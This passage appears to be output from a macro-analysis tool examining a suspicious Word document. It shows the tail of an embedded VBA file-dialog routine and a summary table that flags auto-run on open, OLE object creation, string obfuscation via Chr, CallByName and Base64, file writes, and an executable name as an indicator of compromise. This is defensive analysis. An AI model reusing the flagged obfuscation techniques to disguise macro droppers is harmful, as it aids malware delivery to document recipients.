  524.        .hInstance = 0
  525.         '.strCustomFilter = ""
  526.        '.nMaxCustFilter = 0
  527.        .lpfnHook = 0
  528.         'New for NT 4.0
  529.        .strCustomFilter = String(255, 0)
  530.         .nMaxCustFilter = 255
  531.     End With
  532.     ' This will pass the desired data structure to the
  533.    ' Windows API, which will in turn it uses to display
  534.    ' the Open/Save As Dialog.
  535.    If OpenFile Then
  536.         fResult = vdvd.aht_apiGetOpenFileName()
  537.     Else
  538.         fResult = vdvd.aht_apiGetSaveFileName()
  539.     End If
  540.  
  541.     ' The function call filled in the strFileTitle member
  542.    ' of the structure. You'll have to write special code
  543.    ' to retrieve that if you're interested.
  544.    If fResult Then
  545.         ' You might care to check the Flags member of the
  546.        ' structure to get information about the chosen file.
  547.        ' In this example, if you bothered to pass in a
  548.        ' value for Flags, we'll fill it in with the outgoing
  549.        ' Flags value.
  550.        If Not IsMissing(Flags) Then Flags = OFN.Flags
  551.         ahtCommonFileOpenSave = TrimNull(OFN.strFile)
  552.     Else
  553.         ahtCommonFileOpenSave = vbNullString
  554.     End If
  555. End Function
  556.  
  557.  
  558.  
  559.  
  560. +------------+----------------------+-----------------------------------------+
  561. | Type       | Keyword              | Description                             |
  562. +------------+----------------------+-----------------------------------------+
  563. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  564. | Suspicious | Open                 | May open a file                         |
  565. | Suspicious | Windows              | May enumerate application windows (if   |
  566. |            |                      | combined with Shell.Application object) |
  567. | Suspicious | CreateObject         | May create an OLE object                |
  568. | Suspicious | CallByName           | May attempt to obfuscate malicious      |
  569. |            |                      | function calls                          |
  570. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  571. |            |                      | strings                                 |
  572. | Suspicious | SaveToFile           | May create a text file                  |
  573. | Suspicious | Write                | May write to a file (if combined with   |
  574. |            |                      | Open)                                   |
  575. | Suspicious | Output               | May write to a file (if combined with   |
  576. |            |                      | Open)                                   |
  577. | Suspicious | Open                 | May open a file (obfuscation: VBA       |
  578. |            |                      | expression)                             |
  579. | Suspicious | Write                | May write to a file (if combined with   |
  580. |            |                      | Open) (obfuscation: VBA expression)     |
  581. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  582. |            |                      | may be used to obfuscate strings        |
  583. |            |                      | (option --decode to see all)            |
  584. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  585. |            | Strings              | may be used to obfuscate strings        |
  586. |            |                      | (option --decode to see all)            |
  587. | IOC        | mikapolne.exe        | Executable file name (obfuscation: VBA  |
  588. |            |                      | expression)                             |
  589. +------------+----------------------+-----------------------------------------+